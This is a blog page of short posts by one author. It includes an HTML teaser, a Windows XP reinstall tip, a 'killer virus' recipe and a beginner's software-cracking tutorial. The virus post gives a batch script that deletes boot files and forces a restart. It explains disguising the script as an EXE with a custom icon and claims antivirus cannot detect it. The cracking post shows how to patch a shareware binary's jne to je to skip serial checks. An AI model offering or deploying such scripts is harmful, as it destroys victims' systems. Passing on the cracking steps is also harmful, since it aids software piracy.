Showing posts with label Windows. Show all posts
Showing posts with label Windows. Show all posts

Sunday, 28 October 2012

Make a Website or a Blog "HTML"

So many of us who read blogs or go into websites must wonder how they are designed or how they are made and many of use are probably trying to learn it. Well today i am going to guide you how to learn HTML.
The first thing you need to know is that the websites are made by a language called "HTML".
Now there are many versions of HTML as the language have been developed for ex HTML5. But to learn HTML you must start from the basics. So i cant teach you that right here cause its a long and big language but i can show you from how to learn it.

Click on Read More to follow the 3 simple Steps to learn HTM.

Saturday, 9 January 2010

MAKE A KILLER VIRUS By Ahmed N

MAKE A KILLER VIRUS
steps to create it :

1 - create a new text document

2 - paste this commands in the text document :

———————-

del boot

del autoexec.bat

del bootmgr

del config.sys

del pagefile.sys

shutdown -r -c “you had been by Ahmed n . your pc now is dead !!!!.”

——————————————————————————————————

3 - now save this document as batch file by (save as from file tab thenchange text document to all files and then remove (txt) and put instead(bat)

4 - now its a batch file that can be revealed !!! (by right click it and edit from the menu)

5 - know you have to convert the batch file to an executable file (EXE)

that you can find it free at :

http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html



note : in this tool you can put your exe data , password protect , custom icon,and other utilities with friendly user interface

note 2 : don’t even try to open the file you will hurt your self believe me !!!

note 3 : this virus delete some major boot files and then shut down the computer

the next time you want to turn on it will not boot

so you have to do a complete format.

note 4 : this virus is not detectable by antiviruses.



Thank you for your time

Friday, 8 January 2010

Thursday, 7 January 2010

HOW TO CRACK A SOFTWARE(for beginners) by Ahmed N

HOW TO CRACK A SOFTWARE(for beginners)

How to get started in the art of cracking
—————————————-

Introduction:
————-
Tons of new programs are coming out each day… But the bad thing is that
most of them are shareware, which means that you have to pay to get the full
version (most of the time, when you’ll register, the creators of the program
will e-mail you an unlock code)… But there are some guys called “crackers”
who can modify the program so that you don’t need to pay to get the full
version. In this tutorial, you’ll learn how to crack programs (except VB
programs). I hope that you’ll enjoy it.

———————————————-
| |
|1) Programs that you’ll need to get started |
|2) Basic things about cracking |

1) Programs that you’ll need to get started

—————————————-

Here’s the list of programs that you’ll need to get to start cracking:

WinDisassembler
Hex Workshop
Hacker’s View

2) Basic things about cracking
—————————

Please remember that in this tutorial, I expect that you never cracked a
program, so it should be easy for beginners.

Here is, step by step, what you have to do to crack a program which needs a
name and a serial number (assuming that there’s no good protection):

a) Run the program
cool.gif Go to the place where you can enter your name and a serial number
c) Type your name and any serial number
d) Write down (or memorise) the error message
e) Copy the program’s exe to .bak (for backup) and to .w32
f) Disassemble [progname].w32 with WinDisassembler
g) Click on search -> search. Type the error message, and click on search
h) Scroll up until you find this “Referenced by a (U)nconditional or
©onditional Jump at Address: | blabla” (where blabla is the address)
i) Go to this address by scrolling up (the addresses are writen on the left)
j) There should be “jne” written at this address.

h) Double-click on the line and memorise the offset (written on the status bar)
i) Launch hacker’s view and edit the exe files
j) Press F4 and select Decode Mode
k) Press F5 and type the Offset.
l) Press F3 and type 74 (which will change jne to je)
m) If the program isn’t very securised, it should be cracked now!
n) Run the program
o) Type your name and any serial number
p) It should work!

Note: If it didn’t work, then it means that the program is more protected.
you have to learn more about assamble language and practice hard to crack advanced softwares.

How To Reinstall Windows Without Losing Anything

How To Reinstall Windows Without Losing Anything

You can use this method as often as you like when you need to repair something that had gotten corrupted and you don’t want to do a clean install.

This is better than doing a windows repair install from the cd because doing that can cause changes to settings and even make it so you can’t get updates anymore from microsoft update site because of the ’silent install’ they did a year or so ago (unless you rereg some dll files).

1- Start WindowsXP
2- Go to the location of your source files
3- Run WINNT32 /unattend
For example, D:\I386\winnt32 /unattend ( copy & paste this command into the RUN box, then press ENTER ) Your computer will do the rest.

OR

Start > All Programs > Accessories > Command Prompt.
Copy & paste > D:\I386\winnt32 /unattend (notice the space between 32 and / )
Press Enter.
If you have i386 on your drive, you can replace D: ( if D: is your cd drive ) with the location of it. (be sure it’s the full i386 though)

D: is the driver letter where your windows XP Cd is
if D:\I386\winnt32 /unattend doesn’t work then try : d:\winnt32 /unattend.

Thank you for your time

Post by Ahmed N